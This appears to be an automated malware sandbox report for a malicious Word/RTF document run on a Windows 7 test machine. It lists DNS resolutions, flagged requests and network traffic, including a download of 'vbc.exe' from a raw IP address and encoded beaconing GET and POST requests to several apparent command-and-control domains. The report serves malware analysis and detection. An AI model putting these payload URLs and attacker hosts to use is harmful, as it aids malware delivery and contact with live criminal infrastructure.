Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | April 20, 2023, 4:34 p.m. | April 20, 2023, 4:36 p.m. |
-
WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" C:\Users\test22\AppData\Local\Temp\###############################.doc
3016
Name | Response | Post-Analysis Lookup |
---|---|---|
www.tanforks.xyz | 162.0.228.125 | |
www.jawstraping.com | 162.240.74.72 | |
www.antifa-west.org |
CNAME
ghs.google.com
|
142.250.76.147 |
www.infomysaturn.com |
CNAME
predictwithsenses.com
|
204.27.56.195 |
www.sqlite.org | 45.33.6.223 | |
www.atwtjasasbdh.com |
CNAME
nononewtwo.eens.eu
CNAME
jk8t524g.ffns.ru
|
103.214.22.44 |
Suricata Alerts
Suricata TLS
No Suricata TLS
suspicious_features | Connection to IP address | suspicious_request | GET http://154.91.202.45/90/vbc.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.antifa-west.org/t6t4/?tgsBCfY=ssGDlaKvrM1Gs2+sD8JdC0DLeKE3dUnUQ6mTAZG8EY8ootQconb5U719Xwf9arvCoKYUBxAQQ/mbWT7dDEoxYepTxrisSFFRvpnacVE=&XpfTw=NmpJ | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.atwtjasasbdh.com/t6t4/?tgsBCfY=6X+nuai3+Gul66mjmQ28c0ZlmwwgXmcEpPDIIfk72o6E0RnRG4ylaYKqyh5Ae9yw6Vvu+qYeGcoVzp60AAD0y2SwNXIc8Uem2VD5Cms=&XpfTw=NmpJ | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.infomysaturn.com/t6t4/?tgsBCfY=J+lWmOWzRFYb6ZGDJg/c/uE65ROAxLP5sGlhcaPxy1usod+H/MjcFynVlrmwAULXY1vEuzPNHPQSWuniw4+JBk2ZSmFmkZPZ/PPuHLo=&XpfTw=NmpJ | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.tanforks.xyz/t6t4/?tgsBCfY=fX3XyOzAJM6oM04o/7g23Zy7c/HdQQcghoeFNAWsBFGOx4rN1X7qcFb4Fe0DTcTs0H0+AvSr72QhSydJENna4UFVgzP/3/gTg0f6ty0=&XpfTw=NmpJ | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.jawstraping.com/t6t4/?tgsBCfY=XCntr2iXxRF4OzdOddE0iZuhFmxxz2UYRyIVY/3TZ+QarG+8Mk+hdkB+upmlGNbbMTHm8ylq/Cu6YgjeNTy0eEp8zKtOpX4Of63J+Iw=&XpfTw=NmpJ |
request | GET http://154.91.202.45/90/vbc.exe |
request | GET http://www.antifa-west.org/t6t4/?tgsBCfY=ssGDlaKvrM1Gs2+sD8JdC0DLeKE3dUnUQ6mTAZG8EY8ootQconb5U719Xwf9arvCoKYUBxAQQ/mbWT7dDEoxYepTxrisSFFRvpnacVE=&XpfTw=NmpJ |
request | GET http://www.sqlite.org/2019/sqlite-dll-win32-x86-3290000.zip |
request | POST http://www.atwtjasasbdh.com/t6t4/ |
request | GET http://www.atwtjasasbdh.com/t6t4/?tgsBCfY=6X+nuai3+Gul66mjmQ28c0ZlmwwgXmcEpPDIIfk72o6E0RnRG4ylaYKqyh5Ae9yw6Vvu+qYeGcoVzp60AAD0y2SwNXIc8Uem2VD5Cms=&XpfTw=NmpJ |
request | POST http://www.infomysaturn.com/t6t4/ |
request | GET http://www.infomysaturn.com/t6t4/?tgsBCfY=J+lWmOWzRFYb6ZGDJg/c/uE65ROAxLP5sGlhcaPxy1usod+H/MjcFynVlrmwAULXY1vEuzPNHPQSWuniw4+JBk2ZSmFmkZPZ/PPuHLo=&XpfTw=NmpJ |
request | POST http://www.tanforks.xyz/t6t4/ |
request | GET http://www.tanforks.xyz/t6t4/?tgsBCfY=fX3XyOzAJM6oM04o/7g23Zy7c/HdQQcghoeFNAWsBFGOx4rN1X7qcFb4Fe0DTcTs0H0+AvSr72QhSydJENna4UFVgzP/3/gTg0f6ty0=&XpfTw=NmpJ |
request | POST http://www.jawstraping.com/t6t4/ |
request | GET http://www.jawstraping.com/t6t4/?tgsBCfY=XCntr2iXxRF4OzdOddE0iZuhFmxxz2UYRyIVY/3TZ+QarG+8Mk+hdkB+upmlGNbbMTHm8ylq/Cu6YgjeNTy0eEp8zKtOpX4Of63J+Iw=&XpfTw=NmpJ |
request | POST http://www.atwtjasasbdh.com/t6t4/ |
request | POST http://www.infomysaturn.com/t6t4/ |
request | POST http://www.tanforks.xyz/t6t4/ |
request | POST http://www.jawstraping.com/t6t4/ |
file | C:\Users\test22\AppData\Local\Temp\~$#############################.doc |
filetype_details | Rich Text Format data, version 1, unknown character set | filename | ###############################.doc |
host | 154.91.202.45 |